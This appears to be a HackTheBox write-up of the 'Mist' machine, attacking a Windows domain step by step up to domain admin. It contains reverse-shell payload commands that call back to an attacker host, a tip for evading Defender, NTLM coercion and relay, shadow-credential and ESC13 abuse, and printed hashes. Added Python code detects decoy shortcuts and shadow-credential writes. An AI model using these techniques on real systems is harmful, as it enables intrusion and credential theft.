Mist is an insane-difficulty Windows HackTheBox machine. It starts off with a file read vulnerability in Pluck v4.7.18 to leak the admin password and get hold of a system shell by uploading a malicious module. Then there’s a directory with links in it that we can abuse for a phishing attack to pivot to another user. After that, we find that LDAP signing is off, so we can use PetitPotam to coerce the server and then add shadow credentials to the machine account of the web server to get local admin. Later, we find a KeePass database, do pattern-based hash cracking and obtain its password. Finally, from there we read a gMSA password, abuse AddKeyCredentialLink and exploit ADCS ESC13.
```
PS C:\Users\0xkujen> nmap -A -Pn 10.129.128.221
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-25 16:41 W. Central Africa Standard Time
Nmap scan report for 10.129.128.221
Host is up (1.0s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Mist - Mist
|_Requested resource was http://10.129.128.221/?file=mist
|_http-generator: pluck 4.7.18

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.01 seconds
PS C:\Users\0xkujen>
```
We can see that we have only one open port which is 80, that has a web application running on it, so let’s check it out.
One interesting thing about this interface is that it says that it’s powered by Pluck CMS and we also have a redirect to a login.php once we click on “admin”: Pluck Login
During my initial recon phase, I used Feroxbuster to check for interesting directories and files and stumbled upon this one: Local File Read
Checking this issue on GitHub gives us a good idea of how to proceed, since it describes how we can include files and read them without being authenticated: https://github.com/pluck-cms/pluck/issues/122
One really interesting resource I found was /data/settings/modules/albums/admin_backup.php: Local File Read
I tried to read the file by including the whole path, but it did not work. However, when I inserted only the file name, I got a hit: Local File Read
It looks like a password hash. I used CrackStation to quickly get a password value and I got a hit for lexypoo97.
Pluck v4.7.18 - Remote Code Execution (RCE)
I used that password to log in to the Pluck instance we saw earlier and it was successful: Pluck
Looking at the version displayed on the page footer (v4.7.18), I searched for public exploits and stumbled upon this one. The steps are as follows:
1- Create a php/meterpreter_reverse_tcp payload using msfvenom: msfvenom -p php/meterpreter_reverse_tcp -f raw LHOST=10.10.x.x LPORT=4444 -o kujen.php
2- Zip that to kujen.zip
3- Upload it by navigating to Options => Manage Modules => Install Module
4- Navigate to http://mist.htb/data/modules/kujen/kujen.php
5- Get a reverse shell session in msfconsole:
```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.x.x:4444
[*] Meterpreter session 1 opened (10.10.x.x:4444 -> 10.129.128.221:49975) at 2024-10-25 13:33:31 -0400

meterpreter > getuid
Server username: svc_web
```
And we are in!! The first step now is to get a new reverse shell using windows/x64/meterpreter/reverse_tcp, because the PHP one will not let us keep working comfortably, so I’ll just create a new payload and get my reverse shell:
```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.x.x:4455
[*] Sending stage (201798 bytes) to 10.129.128.221
[*] Meterpreter session 1 opened (10.10.x.x:4455 -> 10.129.128.221:49895) at 2024-10-25 13:42:44 -0400

meterpreter > ls
Listing: C:\xampp\htdocs\data\modules\kujen
===========================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  7168   fil   2024-10-25 13:46:44 -0400  kujen.exe
100666/rw-rw-rw-  34849  fil   2024-10-25 13:46:23 -0400  kujen.php
```
And now we can keep going forward :)
```
PS C:\> net view \\MS01
net view \\MS01
Shared resources at \\MS01

Share name           Type  Used as  Comment

-------------------------------------------------------------------------------
Common Applications  Disk
The command completed successfully.
```
The “Common Applications” folder should not exist, since it is not present in a default Windows installation. Checking it, I find some interesting “.lnk” files. This article was really helpful for me to abuse a popular phishing technique where attackers embed .lnk files into Office documents and camouflage them with MS Word icons in order to deceive victims into clicking and running them.
PS: I tried for a long time to upload my “kujen.exe” again, but it got detected each time. Therefore I searched for a whitelisted folder that would not trigger the detection (which is something everyone should do), and the /files folder made sense to me since it’s a file directory and detection would be weaker there. And that was actually the case for me :) We could also search for Defender exclusions; this article explains it well.
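To audit a share like this one for decoy shortcuts, here is an added example that is not from the original writeup: it parses the .lnk StringData sections per MS-SHLLINK and flags shortcuts whose target is a script host while the icon is borrowed from an Office binary. The two sample files are constructed inside the script; the builder emits only the header and StringData, which is enough for the parser but is not a complete Windows shortcut.

```python
import struct

# MS-SHLLINK LinkFlags bits used here, and the fixed order of the StringData sections
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-000000000046}
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
                 ("working_dir", HAS_WORK_DIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON)]
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
OFFICE_ICONS = ("winword", "excel", "powerpnt", "outlook")

def build_lnk(fields):
    """Constructed fixture: 76-byte ShellLinkHeader plus StringData, no IDList/LinkInfo."""
    flags = IS_UNICODE | sum(bit for key, bit in STRING_FIELDS if key in fields)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x80,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(fields[k])) + fields[k].encode("utf-16-le")
                    for k, bit in STRING_FIELDS if k in fields)
    return header + body

def parse_lnk(data):
    """Return the StringData fields of a shell link, skipping IDList/LinkInfo if present."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:    # IDListSize (u16) followed by the item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (u32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos + 2:pos + 2 + count * width]
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += 2 + count * width
    return fields

def lnk_findings(fields):
    """Reasons a shortcut looks like a decoy: a script-host target wearing an Office icon."""
    launch = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    icon = fields.get("icon_location", "").lower()
    reasons = []
    if any(host in launch for host in SCRIPT_HOSTS):
        reasons.append("target is a script host: " + fields.get("relative_path", ""))
        if any(app in icon for app in OFFICE_ICONS):
            reasons.append("icon borrowed from an Office binary: " + fields.get("icon_location", ""))
    return reasons

# Constructed samples: a decoy of the kind found in the share, and an ordinary shortcut
DECOY = build_lnk({"relative_path": "..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                   "arguments": "-File launcher.ps1",
                   "icon_location": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"})
BENIGN = build_lnk({"name": "Notepad", "relative_path": "..\\Windows\\notepad.exe",
                    "icon_location": "C:\\Windows\\notepad.exe"})

if __name__ == "__main__":
    for label, blob in (("decoy.lnk", DECOY), ("notepad.lnk", BENIGN)):
        print(label, lnk_findings(parse_lnk(blob)) or ["clean"])
```

Real shortcuts usually carry a LinkTargetIDList rather than a relative path, so in production the item list should be decoded too; the StringData check above is the cheap first pass over a file share.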
And we got our reverse shell for the “MIST\Brandon.Keywarp” user:
```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.x.x:4455
[*] Sending stage (201798 bytes) to 10.129.128.221
[*] Meterpreter session 2 opened (10.10.x.x:4455 -> 10.129.128.221:49983) at 2024-10-25 14:24:49 -0400

meterpreter > getuid
Server username: MIST\Brandon.Keywarp
```
Using certificate services to obtain the MIST\brandon.keywarp NTLM hash:
We will be requesting a user certificate from the CA “mist-DC01-CA” on the server “DC01”:
I’ll now run the command openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx on my machine since openssl is not installed on the victim machine and I’ll be getting a cert.pfx file.
Then, I’ll be requesting a TGT for the user brandon.keywarp using the provided certificate file:
Now that we have confirmed that we have a domain user, we can coerce the MS01 machine account into authenticating to us. This was a really helpful article and it was actually the piece I was missing when I first solved the machine. So first, I’ll have to enable the WebDAV client:
```
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.x.x]
    Responder IPv6             [dead:beef:4::1005]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-4VFBEQUM2XP]
    Responder Domain Name      [QIJ9.LOCAL]
    Responder DCE-RPC Port     [47421]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.128.221
[SMB] NTLMv2-SSP Username : MIST\MS01$
[SMB] NTLMv2-SSP Hash     : MS01$::MIST:b7d9b4286a477169:8D35B82B5E42AA5DC34CFBDAC828BADA:01010000000000000044489DFA26DB012DBA172017E8D32D0000000002000800510049004A00390001001E00570049004E002D0034005600460042004500510055004D0032005800500004003400570049004E002D0034005600460042004500510055004D003200580050002E00510049004A0039002E004C004F00430041004C0003001400510049004A0039002E004C004F00430041004C0005001400510049004A0039002E004C004F00430041004C00070008000044489DFA26DB01060004000200000008003000300000000000000000000000004000006D4270F1B6F11653A80041CB7179F07AF54BC5E8DCEF75AB9D15C78A9F899C870A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0037000000000000000000
```
And we get a hit! So now let’s use the ntlmrelayx script from Impacket to get an LDAP shell, clear the existing shadow credentials and then add a new one (we can do that using this specific pull request: https://github.com/fortra/impacket/pull/1402):
```
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] HTTPD(80): Connection from 10.129.166.107 controlled, attacking target ldaps://192.168.100.100
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:636 ... OK
[*] HTTPD(80): Authenticating against ldaps://192.168.100.100 as MIST/MS01$ SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000
[+] No more targets
[*] HTTPD(80): Connection from 10.129.166.107 controlled, but there are no more targets left!
```
One really important thing: do not forget to keep .\DavRelayUp.exe relay -l http://*:5357/ --ComputerName ms01$ -f -m shadowcred --domain mist.htb running the whole time.
```
┌──(kali㉿kali)-[~]
└─$ nc 127.0.0.1 11000
Type help for list of commands

# clear_shadow_creds MS01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108
Shadow credentials cleared successfully!

# set_shadow_creds MS01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108
KeyCredential generated with DeviceID: a7a6bf2a-0197-0a69-a2f0-69702c52ccef
Shadow credentials successfully added!
Saved PFX (#PKCS12) certificate & key at path: 9xpGRCU8.pfx
Must be used with password: 2zFj7mulRkxeaECxp6n5

#
```
Pass the Certificate
I’ll now remove the password protection from the 9xpGRCU8.pfx certificate and save it as unprotected.pfx.
```
┌──(kali㉿kali)-[~/impacket]
└─$ certipy-ad cert -export -pfx 9xpGRCU8.pfx -password 2zFj7mulRkxeaECxp6n5 -out unrpotected.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'unrpotected.pfx'
```
And now authenticate to the mist.htb domain as MS01$ using the unprotected.pfx certificate, acquiring its hash:
```
[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:57e09da59439ab2d04c15e9250237f48
```
Now I’ll request a TGT for the ms01$ account using an RC4 hash for authentication:
```
[*] Building S4U2self request for: '[email protected]'
[*] Using domain controller: DC01.mist.htb (192.168.100.100)
[*] Sending S4U2self request to 192.168.100.100:88
[+] S4U2self success!
[*] Substituting alternative service name 'cifs/ms01.mist.htb'
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):
```
```
[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.12.0-py3.11.egg/impacket
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.101:445 ... OK
[+] Using Kerberos Cache: ms01.ccache
[+] Domain retrieved from CCache: MIST.HTB
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.101:135 ... OK
[+] Using Kerberos Cache: ms01.ccache
[+] Domain retrieved from CCache: MIST.HTB
[+] SPN HOST/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[+] Changing sname from cifs/[email protected] to HOST/[email protected] and hoping for the best
[+] Target system is ms01.mist.htb and isFQDN is True
[+] StringBinding: \\\\MS01[\\PIPE\\atsvc]
[+] StringBinding: \\\\MS01[\\pipe\\SessEnvPublicRpc]
[+] StringBinding: MS01[49669]
[+] StringBinding chosen: ncacn_ip_tcp:ms01.mist.htb[49669]
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.101:49669 ... OK
[+] Using Kerberos Cache: ms01.ccache
[+] Domain retrieved from CCache: MIST.HTB
[+] SPN HOST/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[+] Changing sname from cifs/[email protected] to HOST/[email protected] and hoping for the best
[+] Using Kerberos Cache: ms01.ccache
[+] Domain retrieved from CCache: MIST.HTB
[+] SPN HOST/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[+] Changing sname from cifs/[email protected] to HOST/[email protected] and hoping for the best
[+] Using Kerberos Cache: ms01.ccache
[+] Domain retrieved from CCache: MIST.HTB
[+] SPN HOST/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[+] Changing sname from cifs/[email protected] to HOST/[email protected] and hoping for the best
[+] Using Kerberos Cache: ms01.ccache
[+] Domain retrieved from CCache: MIST.HTB
[+] SPN HOST/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[+] Changing sname from cifs/[email protected] to HOST/[email protected] and hoping for the best
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
mist\administrator
C:\>cd users
C:\users>cd administrator
C:\users\administrator>cd desktop
C:\users\administrator\desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 560D-8100

 Directory of C:\users\administrator\desktop

02/21/2024  08:39 AM    <DIR>          .
09/10/2024  03:45 AM    <DIR>          ..
09/10/2024  03:46 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  11,852,722,176 bytes free
```
```
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
```
```
┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker]
└─$ proxychains4 python3 pywhisker.py -d "mist.htb" --dc-ip 192.168.100.100 -u 'svc_ca$' -H 542fb8bb34abc7460eb6800cd6399e54 --target "svc_cabackup" --action "add"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:389 ... OK
[*] Searching for the target account
[*] Target user found: CN=svc_cabackup,CN=Users,DC=mist,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: bee71310-6810-c2f6-3b94-bacc4aea3e57
[*] Updating the msDS-KeyCredentialLink attribute of svc_cabackup
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: f43g4m4m.pfx
[*] Must be used with password: 53qemuN1Tq4ze0kn1i8F
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```
```
┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker]
└─$ certipy-ad cert -export -pfx f43g4m4m.pfx -password "53qemuN1Tq4ze0kn1i8F" -out unrpotected.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'unrpotected.pfx'

┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker]
└─$ proxychains certipy auth -pfx unprotected.pfx -domain mist.htb -username SVC_CABACKUP -dc-ip 192.168.100.100 -ns 192.168.100.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
proxychains: can't load process 'certipy'. (hint: it's probably a typo): No such file or directory

┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker]
└─$ proxychains certipy-ad auth -pfx unprotected.pfx -domain mist.htb -username SVC_CABACKUP -dc-ip 192.168.100.100 -ns 192.168.100.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[-] Got error: [Errno 2] No such file or directory: 'unprotected.pfx'
[-] Use -debug to print a stacktrace

┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker]
└─$ proxychains certipy-ad auth -pfx unrpotected.pfx -domain mist.htb -username SVC_CABACKUP -dc-ip 192.168.100.100 -ns 192.168.100.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64
```
```
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:53 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:53 ... OK
[*] Requesting certificate via RPC
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:445 ... OK
[*] Successfully requested certificate
[*] Request ID is 62
[*] Got certificate with UPN '[email protected]'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

┌──(kali㉿kali)-[~/hackthebox/mist]
└─$ proxychains certipy-ad auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64
```
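Both shadow-credential writes above (MS01$ on its own object through the relayed LDAP shell, and svc_ca$ on svc_cabackup through pywhisker) land in the domain controller's Directory Service Changes log as event 5136 on msDS-KeyCredentialLink. The following detection is added here and is not part of the writeup: it runs over constructed records normalised the way a SIEM would present them, and flags cross-principal writes as well as a clear followed by a re-add on the same object.

```python
from datetime import datetime, timedelta

# Constructed Directory Service Changes (event 5136) records, normalised the way a
# SIEM would present them. Windows operation codes: %%14674 = Value Added,
# %%14675 = Value Deleted. The sequence mirrors this box: MS01$ clears and re-adds
# its own key credential over the relayed LDAP session, then svc_ca$ writes one
# onto svc_cabackup. Timestamps are made up for the sample.
KCL = "msDS-KeyCredentialLink"
EVENTS = [
    {"time": "2024-10-25T09:02:00", "subject": "MIST\\WS02$",
     "object": "CN=WS02,CN=Computers,DC=mist,DC=htb", "attribute": KCL, "operation": "%%14674"},
    {"time": "2024-10-25T09:05:00", "subject": "MIST\\Administrator",
     "object": "CN=WS02,CN=Computers,DC=mist,DC=htb", "attribute": "description", "operation": "%%14674"},
    {"time": "2024-10-25T18:51:02", "subject": "MIST\\MS01$",
     "object": "CN=MS01,CN=Computers,DC=mist,DC=htb", "attribute": KCL, "operation": "%%14675"},
    {"time": "2024-10-25T18:51:40", "subject": "MIST\\MS01$",
     "object": "CN=MS01,CN=Computers,DC=mist,DC=htb", "attribute": KCL, "operation": "%%14674"},
    {"time": "2024-10-25T19:30:11", "subject": "MIST\\svc_ca$",
     "object": "CN=svc_cabackup,CN=Users,DC=mist,DC=htb", "attribute": KCL, "operation": "%%14674"},
]

def rdn_value(dn):
    """Leading RDN value of a DN: 'CN=MS01,CN=Computers,...' -> 'MS01'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def writes_own_object(subject, dn):
    """True when the writer is the object itself ('MIST\\MS01$' writing CN=MS01)."""
    account = subject.split("\\")[-1].rstrip("$").lower()
    return account == rdn_value(dn).lower()

def detect_shadow_credentials(events, window=timedelta(minutes=5)):
    """Return (rule, subject, object) alerts for suspicious msDS-KeyCredentialLink adds."""
    kcl = sorted((e for e in events if e["attribute"] == KCL), key=lambda e: e["time"])
    alerts = []
    for i, ev in enumerate(kcl):
        if ev["operation"] != "%%14674":
            continue
        # Rule A: one principal adding a key credential to another principal's object
        if not writes_own_object(ev["subject"], ev["object"]):
            alerts.append(("cross-principal key credential add", ev["subject"], ev["object"]))
        # Rule B: the same subject deleted the value on this object shortly before
        t = datetime.fromisoformat(ev["time"])
        for prev in kcl[:i]:
            if (prev["operation"] == "%%14675" and prev["object"] == ev["object"]
                    and prev["subject"] == ev["subject"]
                    and t - datetime.fromisoformat(prev["time"]) <= window):
                alerts.append(("key credential cleared then replaced", ev["subject"], ev["object"]))
                break
    return alerts

if __name__ == "__main__":
    for alert in detect_shadow_credentials(EVENTS):
        print(*alert)
```

A lone self-write by a computer account with no preceding clear looks the same as legitimate device registration, so the remaining check is the 4624 logon and its network source just before it. Event 5136 is only produced when the Directory Service Changes subcategory is audited and the object's SACL covers writes to that attribute.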
ESC13 Abuse
ESC13 applies when the certificate template we enroll in carries an issuance policy OID that is linked to an AD group: authenticating with such a certificate gives us the permissions of that group. So as long as all templates and OIDs are enumerated, we can find a path; https://github.com/JonasBK/Powershell/blob/master/Check-ADCSESC13.ps1 is a good resource for this enumeration.
I will now request a certificate for the svc_cabackup service account using certipy-ad, obtaining a certificate and its private key saved as svc_cabackup.pfx. After authenticating with this certificate, we’ll retrieve the NT hash for the service account and save the Kerberos credential cache for later use. Finally, I extract the SAM registry hive from the target domain controller and dump secrets from it :)
I’ll now run impacket-secretsdump to extract SAM hashes, as well as cached domain logon information and LSA secrets, from the saved registry files. I successfully retrieved the hash for the Administrator, along with the machine account credentials.
Now we can go on the machine and claim our root flag:
```
┌──(kali㉿kali)-[~/hackthebox/mist]
└─$ proxychains4 evil-winrm -u administrator -H 'b46782b9365344abdff1a925601e0385' -i 192.168.100.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:5985 ... OK
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
2d158e0a76edbd******************
*Evil-WinRM* PS C:\Users\Administrator\desktop>
```
That was it for this writeup. And I can say that this was the hardest machine I have ever played on HackTheBox. Was really fun and I learned a lot. -0xkujen